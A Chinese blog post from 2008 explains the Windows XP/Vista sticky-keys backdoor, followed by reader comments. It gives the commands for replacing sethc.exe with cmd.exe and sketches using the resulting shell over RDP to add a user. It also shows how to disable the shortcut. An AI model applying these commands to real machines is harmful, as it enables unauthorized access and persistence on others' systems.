最新消息:点击查看大S的省钱秘笈

简单说下XP/Vista的粘滞键漏洞

电脑技巧 Slyar 131浏览 0评论

文章作者:姜南(Slyar) 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。

大学里面有同学问,我直接写出来凑文章数好了。某几个人勿要鄙视我,看看你们写那么高深的东西有几个人去看......我这叫普及安全知识,懂不懂?

好了,回归正题,既然是粘滞键漏洞,首先我们要知道粘滞键是什么。

"粘滞键"是为同时按下两个或更多个键有困难的人设计的。当快捷方式要求使用诸如 CTRL 键 + S 键等的组合键时,“粘滞键”允许用户按下修改键(CTRL 键、ALT 键或 SHIFT 键)或 Windows 徽标键之后,它能保持这些键的活动状态直到按下其他键。

那么怎么调用出粘滞键呢?很简单,按五次shift键,之后就会出现粘滞键的应用程序了。

重点在这。既然按五次shift键会出现粘滞键程序,那么就一定有一个exe跟他关联,而这个exe是可以通过按五次shift键来运行的。如果我们把这个被激活的程序替换成cmd.exe,那么只要我们按五次shift键,就会得到一个cmdshell了。

del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe

恩,差不多就是这些命令,把sethc.exe替换成我们的cmd.exe,运行之后按五次shift看看,是不是出现了shell?

这个应用应该是很广泛的,比如我们在SQL里把粘滞键程序换掉,然后直接3389登陆上去,再之后按五次shift,最后加用户,登入......恩,就这样吧,简单介绍,其他应用自己琢磨去。

最后说一下如何禁用粘滞键功能。开始--设置--控制面板--辅助功能选项--(粘滞键)设置--把"使用快捷键"前面的勾去掉,完成。现在按五次shift就无法调出粘滞键程序了。

转载请注明:Slyar Home » 简单说下XP/Vista的粘滞键漏洞

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (12)

  1. 首先你得有足够的权限才能这么做。 但是当你有了足够的权限还需要这么做么?
    匿名8年前 (2008-11-14)回复
    • 拜托,我只是介绍一下,不用这么认真吧? 想显示你的技术去EST,别在我这捣乱,OK?
      Slyar8年前 (2008-11-14)回复
  2. [quote]关键还是权限问题。。[/quote]
    felix0218年前 (2008-11-11)回复
  3. 那文章中的那个竖的线是怎么出来的,我用live writer就可以
    zonghua8年前 (2008-11-11)回复
    • 那就是普通的引用啊...晕...
      Slyar8年前 (2008-11-11)回复
  4. 看的出你也是使用live writer的
    zonghua8年前 (2008-11-10)回复
    • 呵呵,错了,我从来没用过live writer~~~
      Slyar8年前 (2008-11-10)回复
  5. 既然如此那删掉好了
    rain8年前 (2008-11-09)回复
  6. 麻烦修改一下友情链接的名称,pcliver.cn的这个,修改为东莞/梅州SEO,谢谢
    rain8年前 (2008-11-09)回复
    • 不喜欢SEO的名字,删除链接好了。
      Slyar8年前 (2008-11-09)回复
  7. 科普,科普, 转走....
    salors8年前 (2008-11-09)回复
  8. 呵呵,学习了不错
    相宜本草8年前 (2008-11-09)回复